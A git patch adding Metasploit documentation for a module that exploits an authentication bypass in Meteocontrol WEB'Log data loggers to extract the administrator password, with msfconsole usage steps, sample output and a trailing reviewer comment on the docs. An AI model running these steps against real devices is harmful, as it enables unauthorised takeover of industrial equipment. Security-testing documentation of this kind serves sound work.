From dc33d417e029e8970342eb257343397164a9745f Mon Sep 17 00:00:00 2001 From: juushya Date: Sun, 8 Jan 2017 13:44:38 +0530 Subject: [PATCH] Add Meteocontrol Weblog Doc - PR #7790 --- .../http/meteocontrol_weblog_extractadmin.md | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md new file mode 100644 index 0000000000..68d227a58d --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md 
@@ -0,0 +1,54 @@ +Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. + +Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. + +## Verification Steps + +1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: ```run``` + +## Sample Output + + ``` +msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin +msf auxiliary(meteocontrol_weblog_extractadmin) > info + + Name: MeteoControl WEBLog Password Extractor + Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin + License: Metasploit Framework License (BSD) + Rank: Normal + +Provided by: + Karn Ganeshen + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target address range or CIDR identifier + RPORT 8080 yes The target port + SSL false no Negotiate SSL/TLS for outgoing connections + THREADS 1 yes The number of concurrent threads + VHOST no HTTP server virtual host + +Description: + This module exploits an authentication bypass vulnerability in + Meteocontrol WEBLog (all models) to extract Administrator password + for the device management portal. + +References: + https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01 + http://cvedetails.com/cve/2016-2296/ + http://cvedetails.com/cve/2016-2298/ + +msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4 +msf auxiliary(meteocontrol_weblog_extractadmin) > run + +[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal... +[*] 1.2.3.4:8080 - Attempting to extract Administrator password... 
+[+] 1.2.3.4:8080 - Password is password +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + ```
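Review bot: Step 1 under "Verification Steps" omits the `use` command. It gives only the module path `auxiliary/scanner/http/meteocontrol_weblog_extractadmin`, while the sample output loads the module with `use auxiliary/scanner/http/meteocontrol_weblog_extractadmin`, so the step cannot be followed as written. The list also stops at `run` without saying what a successful run shows. Add a final step stating that the Administrator password is printed, as in the `Password is ...` line of the sample output, and describe what the module prints in the case the note mentions, where the 'Website password' page is renamed or not present, so a tester can tell that case apart from a failed run. The note refers to "some versions" without naming them; list them if they are known. Wording nits in the opening paragraph: "affected with" should be "affected by", and "can not" should be "cannot".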